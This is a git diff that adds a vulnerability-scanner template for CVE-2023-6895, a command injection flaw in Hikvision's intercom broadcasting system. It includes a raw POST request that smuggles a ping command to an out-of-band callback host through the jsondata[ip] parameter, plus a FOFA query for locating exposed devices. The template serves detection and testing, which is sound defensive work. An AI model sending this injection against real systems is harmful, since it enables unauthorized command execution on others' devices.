diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml new file mode 100644 index 0000000000..278493d6b8 --- /dev/null +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -0,0 +1,55 @@ +id: CVE-2023-6895 + +info: + name: Hikvision Intercom Broadcasting System - Command Execution + author: archer + severity: critical + description: | + Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection. + reference: + - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py + - https://vuldb.com/?ctiid.248254 + - https://vuldb.com/?id.248254 + - https://github.com/Marco-zcl/POC + - https://github.com/d4n-sec/d4n-sec.github.io + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-6895 + cwe-id: CWE-78 + epss-score: 0.0008 + epss-percentile: 0.32716 + cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: hikvision + product: intercom_broadcast_system + fofa-query: icon_hash="-1830859634" + tags: cve,cve2023,rce,hikvision + +http: + - raw: + - | + POST /php/ping.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Requested-With: XMLHttpRequest + + jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: body + words: + - "TTL=" + + - type: status + status: + - 200